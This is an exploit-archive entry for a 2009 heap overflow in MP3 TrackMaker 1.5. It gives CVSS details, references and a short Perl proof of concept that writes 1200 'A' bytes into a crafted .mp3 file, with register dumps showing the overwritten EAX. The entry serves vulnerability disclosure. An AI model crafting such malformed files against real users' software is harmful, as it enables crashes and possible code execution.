MP3 TrackMaker 1.5 (.mp3 File) Local Heap Overflow PoC

2009.01.21
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# #!/bin/perl # Author : HouSSamix # MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC # http://www.heathcosoft.com/software/mp3trackmaker/mp3tm15.exe # open the program > browse (source file) > file exploit #EAX 41414141 <<< #ECX 000000F8 #EDX 0000020A #EBX 00000000 #ESP 0012F408 #EBP 0012F470 #ESI 00000000 #EDI 00000158 #EIP 7C91EB94 ntdll.KiFastSystemCallRet print "===================================================================== \n"; print "Author : Houssamix \n"; print "===================================================================== \n"; print "MP3 TrackMaker v1.5 .mp3 File Heap Overflow PoC \n"; print "===================================================================== \n\n"; my $file="hsmx.mp3"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE "A" x 1200; close($FILE); print "$file has been created \n";

References:

http://xforce.iss.net/xforce/xfdb/47852
http://www.securityfocus.com/bid/33183
http://www.milw0rm.com/exploits/7708


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top